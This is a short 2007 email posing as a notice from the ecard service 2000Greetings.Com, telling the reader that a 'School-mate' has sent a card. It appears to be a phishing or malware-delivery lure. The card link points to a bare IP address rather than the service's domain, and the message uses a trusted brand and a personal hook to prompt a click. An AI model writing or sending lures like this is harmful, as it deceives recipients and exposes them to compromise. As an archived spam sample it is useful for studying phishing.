Subject: School-mate sent you an ecard from 2000Greetings.Com!

From: "2000Greetings.Com" <[email-masked]>
Date: Fri, 10 Aug 2007 05:44:41 -0400

School-mate has created a greeting card for you at 2000Greetings.Com,
the Internet's most popular greeting card service. 

Your greeting card ID is: 8e117868911e6c36a4bc955099675c50080d02 

To see your custom greeting card, simply click on the link below: 
http://97.97.19.185/?8e117868911e6c36a4bc955099675c50080d02

Send greeting cards from 2000Greetings.Com whenever you want by visiting us at: 
http://2000Greetings.Com/
Copyright (c) 1996-2007 2000Greetings.Com All Rights Reserved